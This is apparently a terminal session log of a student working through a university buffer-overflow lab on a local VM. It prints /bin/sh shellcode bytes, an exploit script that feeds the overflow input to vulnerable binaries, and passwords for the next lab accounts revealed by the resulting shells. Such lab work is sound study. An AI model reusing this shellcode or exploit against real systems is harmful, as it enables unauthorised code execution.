GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0xc0310876 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 17132] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 17184] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x90f6ffbf in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 17233] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0xc0310876 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 17276] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0xc0310876 in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 17494] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) quit
A debugging session is active.

	Inferior 1 [process 17528] will be killed.

Quit anyway? (y or n) y
vsftpd@pwnable:~$ vi egg
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test
process 17563 is executing new program: /bin/dash
[Inferior 1 (process 17563) exited normally]
(gdb) c
The program is not being run.
(gdb) Run < test
Starting program: /bin/dash < test
/bin/dash: 1: junkjunkjunkjunkjunk?????^?1??F?F
                                               ?
                                                ???V
                                                    ̀1ۉ?@̀?????/bin/sh: not found
[Inferior 1 (process 17594) exited with code 0177]
(gdb) quit
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test
process 17622 is executing new program: /bin/dash
[Inferior 1 (process 17622) exited normally]
(gdb) quit
vsftpd@pwnable:~$ vi exploit
vsftpd@pwnable:~$ ./egg > test
vsftpd@pwnable:~$ invoke -d dejavu
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/vsftpd/dejavu...done.
(gdb) Run < test
Starting program: /home/vsftpd/dejavu < test
process 17722 is executing new program: /bin/dash
[Inferior 1 (process 17722) exited normally]
(gdb) ls
Undefined command: "ls".  Try "help".
(gdb) whoami
Undefined command: "whoami".  Try "help".
(gdb) q
vsftpd@pwnable:~$ ls
dejavu  dejavu.c  egg  exploit  README  test  WELCOME
vsftpd@pwnable:~$ ./dejavu.c
-bash: ./dejavu.c: Permission denied
vsftpd@pwnable:~$ vim exploit
vsftpd@pwnable:~$ exploit
exploit: command not found
vsftpd@pwnable:~$ ./exploit
^C
vsftpd@pwnable:~$ sh exploit
^C
vsftpd@pwnable:~$ chmod +x exploit
vsftpd@pwnable:~$ ./exploit
ls
README	WELCOME  dejavu  dejavu.c  egg	exploit  test
whoami
smith
cat README
Welcome to the real world.

user: smith
pass: f6g(Bz{w
^C
vsftpd@pwnable:~$ exit
logout
Connection to 127.0.0.1 closed.
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 smith@127.0.0.1
f6(Bz{w
smith@127.0.0.1's password:
Permission denied, please try again.
smith@127.0.0.1's password:
Permission denied, please try again.
smith@127.0.0.1's password:

Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 smith@127.0.0.1
smith@127.0.0.1's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

                                                        _/        _/
     _/_/_/    _/      _/      _/  _/_/_/      _/_/_/  _/_/_/    _/    _/_/
    _/    _/  _/      _/      _/  _/    _/  _/    _/  _/    _/  _/  _/_/_/_/
   _/    _/    _/  _/  _/  _/    _/    _/  _/    _/  _/    _/  _/  _/
  _/_/_/        _/      _/      _/    _/    _/_/_/  _/_/_/    _/    _/_/_/
 _/
_/

Last login: Thu Jan 28 11:52:00 2016 from 10.0.2.2
smith@pwnable:~$ ls
agent-smith  agent-smith.c  anderson.txt  exploit  generate-file-contents  README
smith@pwnable:~$ Connection to 127.0.0.1 closed by remote host.
Connection to 127.0.0.1 closed.
Rameshs-MacBook-Pro-3:~ Tara$
  [Restored Feb 6, 2017, 10:33:01 PM]
Last login: Mon Feb  6 22:32:51 on console
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 smith@127.0.01
The authenticity of host '[127.0.01]:2222 ([127.0.0.1]:2222)' can't be established.
ECDSA key fingerprint is SHA256:0d25HRmF+6QJGKx2XcQDAMcqfc9+rzEmjcM50tev8+c.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.01]:2222' (ECDSA) to the list of known hosts.
smith@127.0.01's password:
                                                        _/        _/
     _/_/_/    _/      _/      _/  _/_/_/      _/_/_/  _/_/_/    _/    _/_/
    _/    _/  _/      _/      _/  _/    _/  _/    _/  _/    _/  _/  _/_/_/_/
   _/    _/    _/  _/  _/  _/    _/    _/  _/    _/  _/    _/  _/  _/
  _/_/_/        _/      _/      _/    _/    _/_/_/  _/_/_/    _/    _/_/_/
 _/
_/

Last login: Sun Feb  5 23:11:34 2017 from 10.0.2.2
smith@pwnable:~$ ls
agent-smith  agent-smith.c  anderson.txt  exploit  generate-file-contents  README
smith@pwnable:~$ vi agent-smith.c
smith@pwnable:~$ ls
agent-smith    anderson.txt  generate-file-contents
agent-smith.c  exploit       README
smith@pwnable:~$ vi generate-file-contents
smith@pwnable:~$ vi generate-file-contents
smith@pwnable:~$ vi agent-smith.c
smith@pwnable:~$ vi egg
smith@pwnable:~$ vi agent-smith.c
smith@pwnable:~$ vi generate-file-contents
smith@pwnable:~$ vi blah
smith@pwnable:~$ la
agent-smith    .bashrc  egg                     .profile  .viminfo
agent-smith.c  blah     exploit                 README
anderson.txt   .cache   generate-file-contents  .ssh
smith@pwnable:~$ ls
agent-smith    anderson.txt  egg      generate-file-contents
agent-smith.c  blah          exploit  README
smith@pwnable:~$ ./ generate-file-contents < blah
-bash: ./: Is a directory
smith@pwnable:~$ ./generate-file-contents < blah
We are doing our 161 project in main stacks then we have 170 lecture there is
a lot of work to do we have an essay and at least
smith@pwnable:~$ vi blah
smith@pwnable:~$ ./generate-file-contents < blah
#!/usr/bin/env python

def main():
  print(" We are doing our 161 project in main stacks then we have 170 lecture
  there is a
smith@pwnable:~$ ls
agent-smith    anderson.txt  egg      generate-file-contents
agent-smith.c  blah          exploit  README
smith@pwnable:~$ vi egg
smith@pwnable:~$ vi egg
smith@pwnable:~$ vi egg
smith@pwnable:~$ chmod +x egg
smith@pwnable:~$ ls
agent-smith    anderson.txt  egg      generate-file-contents
agent-smith.c  blah          exploit  README
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke agent-smith pwnzerized
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
Segmentation fault
smith@pwnable:~$ ./egg > test
smith@pwnable:~$ invoke agent-smith test
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
Segmentation fault
smith@pwnable:~$ vi egg
smith@pwnable:~$ python egg
?""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""ADDR?^?1??F?F
                   ?
                    ???V
                        ̀1ۉ?@̀?????/bin/sh
smith@pwnable:~$ vi egg
smith@pwnable:~$ ./egg > test
./egg: line 1: xffx22x22x22x01x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x02x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x03x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x04x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x05x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x06x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x07x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x08x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22ADDRxebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxffx2fx62x69x6ex2fx73x68: command not found
smith@pwnable:~$ invoke agent-smith test
smith@pwnable:~$ ls
agent-smith  agent-smith.c  anderson.txt  blah  egg  exploit  generate-file-contents  pwnzerized  README  test
smith@pwnable:~$ vi generate-file-contents
smith@pwnable:~$ vi blah
smith@pwnable:~$ ./generate-file-contents blah
#!/usr/bin/env python

def main():
  print(" We are doing our 161 project in main stacks then we have 170 lecture
  there is a
smith@pwnable:~$ vi pwnzerized
smith@pwnable:~$ ls
agent-smith  agent-smith.c  anderson.txt  blah  egg  exploit  generate-file-contents  pwnzerized  README  test
smith@pwnable:~$ vi pwnzerized
smith@pwnable:~$ vim exploit
smith@pwnable:~$ ./exploit
./egg: 1: ./egg: xffx22x22x22x01x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x02x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x03x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x04x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x05x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x06x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x07x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x08x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22ADDRxebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxffx2fx62x69x6ex2fx73x68: File name too long
smith@pwnable:~$ vi egg
smith@pwnable:~$ vim pwnzerized
smith@pwnable:~$ vim generate-file-contents
smith@pwnable:~$ vim agent-smith
smith@pwnable:~$ vim a
agent-smith    agent-smith.c  anderson.txt
smith@pwnable:~$ vim a
agent-smith    agent-smith.c  anderson.txt
smith@pwnable:~$ vim agent-smith.c
smith@pwnable:~$ vim anderson.txt
smith@pwnable:~$ ./generate-file-contents anderson.txt
{zYou have a problem with authority, Mr. Anderson.
You believe you are special, that somehow the rules do not apply to you.
smith@pwnable:~$ vim agent-smith.c
smith@pwnable:~$ ./exploit
./egg: 1: ./egg: xffx22x22x22x01x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x02x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x03x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x04x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x05x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x06x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x07x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x08x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22x22ADDRxebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8xdcxffxffxffx2fx62x69x6ex2fx73x68: File name too long
smith@pwnable:~$ vim egg
smith@pwnable:~$ python egg
?""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""ADDR?^?1??F?F
                 ?
                  ???V
                      ̀1ۉ?@̀?????/bin/sh
smith@pwnable:~$ ./exploit
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
Segmentation fault
smith@pwnable:~$ run exploit
No command 'run' found, did you mean:
 Command 'zrun' from package 'moreutils' (universe)
 Command 'runq' from package 'exim4-daemon-heavy' (main)
 Command 'runq' from package 'exim4-daemon-light' (main)
 Command 'runq' from package 'sendmail-bin' (universe)
 Command 'grun' from package 'grun' (universe)
 Command 'qrun' from package 'torque-client' (universe)
 Command 'qrun' from package 'torque-client-x11' (universe)
 Command 'lrun' from package 'lustre-utils' (universe)
 Command 'rn' from package 'trn' (multiverse)
 Command 'rn' from package 'trn4' (multiverse)
 Command 'rup' from package 'rstat-client' (universe)
 Command 'srun' from package 'slurm-llnl' (universe)
run: command not found
smith@pwnable:~$ exploit
exploit: command not found
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./exploit
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
Segmentation fault
smith@pwnable:~$ invoke exploit
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
Segmentation fault
smith@pwnable:~$ vim exploit
smith@pwnable:~$ egg > pwnzerized
No command 'egg' found, did you mean:
 Command 'eg' from package 'easygit' (universe)
 Command 'ekg' from package 'ekg' (universe)
 Command 'ekg' from package 'ekg-gtk' (universe)
 Command 'eog' from package 'eog' (main)
egg: command not found
smith@pwnable:~$ egg > pwnzerized
No command 'egg' found, did you mean:
 Command 'eg' from package 'easygit' (universe)
 Command 'ekg' from package 'ekg' (universe)
 Command 'ekg' from package 'ekg-gtk' (universe)
 Command 'eog' from package 'eog' (main)
egg: command not found
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) r
Starting program: /home/smith/agent-smith pwnzerized
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?

Program received signal SIGSEGV, Segmentation fault.
0x0876895e in ?? ()
(gdb) b main
Breakpoint 1 at 0x804855e: file agent-smith.c, line 23.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/smith/agent-smith pwnzerized

Breakpoint 1, main (argc=2, argv=0xbffff724) at agent-smith.c:23
23	  if (argc != 2)
(gdb) layout split
smith@pwnable:~$ vim egg
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) layout split
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) r
Starting program: /home/smith/agent-smith pwnzerized
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?

Program received signal SIGSEGV, Segmentation fault.
0x76895e1f in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 4097] will be killed.

Quit anyway? (y or n) y
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) r
Starting program: /home/smith/agent-smith pwnzerized
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?

Program received signal SIGSEGV, Segmentation fault.
0xbffff66c in ?? ()
(gdb) b main
Breakpoint 1 at 0x804855e: file agent-smith.c, line 23.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/smith/agent-smith pwnzerized

Breakpoint 1, main (argc=2, argv=0xbffff724) at agent-smith.c:23
23	  if (argc != 2)
(gdb) layout split
smith@pwnable:~$
smith@pwnable:~$ vim agent-smith.c
smith@pwnable:~$ vim egg
smith@pwnable:~$ vim agent-smith.c
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) r
Starting program: /home/smith/agent-smith pwnzerized
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?

Program received signal SIGSEGV, Segmentation fault.
0x895e1feb in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 4797] will be killed.

Quit anyway? (y or n) y
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) b main
Breakpoint 1 at 0x804855e: file agent-smith.c, line 23.
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) r
Starting program: /home/smith/agent-smith pwnzerized
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?

Program received signal SIGSEGV, Segmentation fault.
0xbffff66c in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 4865] will be killed.

Quit anyway? (y or n) y
smith@pwnable:~$ vi agent-smith.c
smith@pwnable:~$ vim egg
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) r
Starting program: /home/smith/agent-smith pwnzerized
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
process 5013 is executing new program: /bin/dash
$ ls
README	agent-smith  agent-smith.c  anderson.txt  blah	egg  exploit  generate-file-contents  pwnzerized  test
$ whoami
smith
$ vim README


~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
E138: Can't write viminfo file $HOME/.viminfo!
Press ENTER or type command to continue
$ q
/bin/sh: 4: q: not found
$ :q
/bin/sh: 5: :q: not found
$ ^C
Program received signal SIGINT, Interrupt.
0xb7fdd424 in ?? ()
(gdb) q
A debugging session is active.

	Inferior 1 [process 5013] will be killed.

Quit anyway? (y or n) y
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ ./exploit
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
$ ls
README	agent-smith  agent-smith.c  anderson.txt  blah	egg  exploit  generate-file-contents  pwnzerized  test
$ whoami
brown
$ vim exploit

#!/bin/sh
./egg > pwnzerized
invoke agent-smith pwnzerized
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
E138: Can't write viminfo file $HOME/.viminfo!
Press ENTER or type command to continue
$ q
/bin/sh: 4: q: not found
$ :q
/bin/sh: 5: :q: not found
$ q
/bin/sh: 6: q: not found
$ quit
/bin/sh: 7: quit: not found
$ ls
README	agent-smith  agent-smith.c  anderson.txt  blah	egg  exploit  generate-file-contents  pwnzerized  test
$ whoami
brown
$ ls
README	agent-smith  agent-smith.c  anderson.txt  blah	egg  exploit  generate-file-contents  pwnzerized  test
$ ^C
$ ^C
$
smith@pwnable:~$ ./egg > pwnzerized
smith@pwnable:~$ invoke -d agent-smith pwnzerized
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/smith/agent-smith...done.
(gdb) q
smith@pwnable:~$ ./exploit
junk"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""?
$ ls
README	agent-smith  agent-smith.c  anderson.txt  blah	egg  exploit  generate-file-contents  pwnzerized  test
$ vi README

Never send a human to do a machine's job.

user: brown
pass: Zsps7Z):
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
E138: Can't write viminfo file $HOME/.viminfo!
Press ENTER or type command to continue
$ ls
README	agent-smith  agent-smith.c  anderson.txt  blah	egg  exploit  generate-file-contents  pwnzerized  test
$ ^C
$
smith@pwnable:~$ exit
logout
Connection to 127.0.01 closed.
Rameshs-MacBook-Pro-3:~ Tara$ ssh -p 2222 brown@127.0.0.1
brown@127.0.0.1's password:

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

                                                        _/        _/
     _/_/_/    _/      _/      _/  _/_/_/      _/_/_/  _/_/_/    _/    _/_/
    _/    _/  _/      _/      _/  _/    _/  _/    _/  _/    _/  _/  _/_/_/_/
   _/    _/    _/  _/  _/  _/    _/    _/  _/    _/  _/    _/  _/  _/
  _/_/_/        _/      _/      _/    _/    _/_/_/  _/_/_/    _/    _/_/_/
 _/
_/

Last login: Thu Jan 28 11:52:40 2016 from 10.0.2.2
brown@pwnable:~$ ls
agent-brown  agent-brown.c  exploit  README
brown@pwnable:~$ vim exploit
brown@pwnable:~$ vim agent-brown.c
brown@pwnable:~$ ls
agent-brown  agent-brown.c  exploit  README
brown@pwnable:~$ vim egg
brown@pwnable:~$ ls
agent-brown  agent-brown.c  egg  exploit  README
brown@pwnable:~$ chmod +xegg
chmod: missing operand after `+xegg'
Try `chmod --help' for more information.
brown@pwnable:~$ chmod +x egg
brown@pwnable:~$ ls
agent-brown  agent-brown.c  egg  exploit  README
brown@pwnable:~$ vim egg
brown@pwnable:~$ ls
agent-brown  agent-brown.c  egg  exploit  README
brown@pwnable:~$ vim exploit
brown@pwnable:~$ ./exploit
./exploit: 2: ./exploit: ./arg: not found
brown@pwnable:~$ vim README
brown@pwnable:~$ ./egg > test
brown@pwnable:~$ invoke -d agent-brown test
GNU gdb (GDB) 7.5-ubuntu
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
